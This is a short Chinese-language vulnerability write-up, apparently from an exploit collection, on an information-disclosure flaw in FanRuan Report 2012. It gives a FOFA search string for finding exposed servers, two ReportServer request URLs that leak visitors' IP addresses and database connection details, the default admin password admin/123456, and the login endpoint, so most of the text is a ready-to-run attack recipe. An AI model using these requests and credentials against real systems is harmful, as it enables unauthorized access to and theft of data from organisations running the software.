# 帆软报表 2012 信息泄露漏洞

### 漏洞描述 <a href="#lou-dong-miao-shu" id="lou-dong-miao-shu"></a>

帆软报表 2012 存在信息泄露漏洞，通过访问特定的Url获取部分敏感信息

### 漏洞影响 <a href="#lou-dong-ying-xiang" id="lou-dong-ying-xiang"></a>

帆软报表 2012

### FOFA <a href="#fofa" id="fofa"></a>

body="down.download?FM\_SYS\_ID"

### 漏洞复现 <a href="#lou-dong-fu-xian" id="lou-dong-fu-xian"></a>

获取登录报表系统的IP

```
http://xxx.xxx.xxx.xxx/ReportServer?op=fr_server&cmd=sc_visitstatehtml&showtoolbar=false
```

![](https://4279400230-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MgxNkYa2vR6HNnHdkjg%2F-MhmHlL9E8yT4gpG4xEK%2F-MhmJ-B6wIV3jLdofebB%2Fimage.png?alt=media\&token=aaa8f595-b570-4eb0-ada9-84cee70742b1)

数据库信息泄露

```
http://xxx.xxx.xxx.xxx/ReportServer?op=fr_server&cmd=sc_getconnectioninfo
```

![](https://4279400230-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MgxNkYa2vR6HNnHdkjg%2F-MhmHlL9E8yT4gpG4xEK%2F-MhmJ1rZhibaNPgU6FOj%2Fimage.png?alt=media\&token=fbcb4295-5ac8-45d0-9539-106c3aef80ee)

后台默认口令 admin/123456

```
/ReportServer?op=fr_auth&cmd=ah_login&_=new%20Date().getTime()
```